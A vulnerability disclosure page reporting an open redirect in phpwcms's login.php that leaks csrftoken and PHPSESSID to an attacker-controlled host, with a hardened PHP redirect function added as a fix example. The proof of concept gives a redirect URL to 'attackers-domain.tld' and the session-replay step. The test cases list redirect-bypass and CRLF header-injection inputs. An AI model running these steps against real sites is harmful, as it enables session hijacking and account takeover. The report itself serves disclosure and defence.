Open Redirect in slackero/phpwcms

Valid

Reported on

Aug 12th 2021


✍️ Description

Session hijacking via open redirection

🕵️‍♂️ Proof of Concept

Steps to reproduce
1. Go to http://your-domain.tld/login.php?ref=http://attackers-domain.tld/?
2. Log in to a valid account
3. You will be redirected to http://attackers-domain.tld/?&csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy (the csrftoken and PHPSESSID query parameters are appended by the application to the attacker-controlled ref target)

💥 Impact

This vulnerability allows an attacker to steal the victim's csrftoken and PHPSESSID values, because login.php appends them to whatever URL is supplied in the ref parameter and the redirect target is not restricted to the site's own host.

When the attacker goes to http://your-domain.tld/phpwcms.php?csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy, the valid user's session will be hijacked.

📍 Location

login.php#L81, login.php#L243
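The report points at two defects in the login flow: the ref parameter is used as a redirect target without being restricted to the site, and session material is appended to that target. The following is an added example of how a post-login redirect can be hardened against both; it is not phpwcms code and not the fix in commit 45171f. The function name safe_login_redirect and the constructed test inputs are assumptions made for illustration.

```php
<?php
// Added example, not phpwcms code: reduce an untrusted "ref" value to a
// same-site path and keep session identifiers out of the URL entirely.
declare(strict_types=1);

// Session hardening (must run before session_start()): the session id is
// accepted and emitted only as a cookie, so a link can never carry PHPSESSID,
// and an id that the server did not issue is rejected rather than adopted.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
ini_set('session.use_strict_mode', '1');

/**
 * Return a same-site redirect path derived from $ref, or $fallback.
 *
 * Rejected: absolute URLs (any scheme), scheme-relative "//host", userinfo,
 * backslashes (browsers normalise "/\host" to "//host"), and control
 * characters (CR/LF in a Location header would allow header injection).
 * Even for an accepted path, token-carrying query parameters are dropped.
 */
function safe_login_redirect(?string $ref, string $fallback = 'index.php'): string
{
    if ($ref === null || $ref === '' || strlen($ref) > 2048) {
        return $fallback;
    }
    if (preg_match('/[\x00-\x1F\x7F\\\\]/', $ref)) {
        return $fallback;
    }
    $parts = parse_url($ref);
    if ($parts === false
        || isset($parts['scheme']) || isset($parts['host'])
        || isset($parts['user'])   || isset($parts['pass'])) {
        return $fallback;
    }
    $path = $parts['path'] ?? '';
    if ($path === '' || substr($path, 0, 2) === '//') {
        return $fallback;
    }
    $query = '';
    if (isset($parts['query'])) {
        parse_str($parts['query'], $q);
        // Never forward session or CSRF tokens through the URL, even same-site.
        unset($q['csrftoken'], $q['PHPSESSID']);
        $query = $q ? '?' . http_build_query($q) : '';
    }
    return $path . $query;
}

// Constructed inputs: the report's payload, common open-redirect variants,
// and two benign same-site targets. Expected results are on the right.
$cases = [
    'http://attackers-domain.tld/?'          => 'index.php',
    '//attackers-domain.tld/'                => 'index.php',
    '/\\attackers-domain.tld/'               => 'index.php',
    'javascript:alert(1)'                    => 'index.php',
    "/index.php\r\nSet-Cookie: x=1"          => 'index.php',
    '/phpwcms.php?do=articles'               => '/phpwcms.php?do=articles',
    'phpwcms.php?do=articles&PHPSESSID=abc'  => 'phpwcms.php?do=articles',
];
foreach ($cases as $in => $want) {
    $got = safe_login_redirect($in);
    printf("%-45s -> %-28s %s\n", json_encode($in), $got,
        $got === $want ? 'ok' : 'MISMATCH');
}

// Usage in a login handler: the Location header receives only the vetted path.
// header('Location: ' . safe_login_redirect($_GET['ref'] ?? null), true, 303);
```

The allow-list approach (accept only a relative path on this host) is deliberately stricter than trying to enumerate dangerous prefixes, because parsers and browsers disagree on edge cases such as backslashes and scheme-relative URLs. Dropping csrftoken and PHPSESSID from the query is a second, independent layer: with session.use_only_cookies set, a PHPSESSID in a URL is ignored by PHP anyway, but the token should still never be written into a link that can end up in referrer headers or logs.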

bAu modified the report
2 years ago
We have contacted a member of the slackero/phpwcms team and are waiting to hear back 2 years ago
slackero/phpwcms maintainer validated this vulnerability 2 years ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
slackero/phpwcms maintainer marked this as fixed with commit 45171f 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE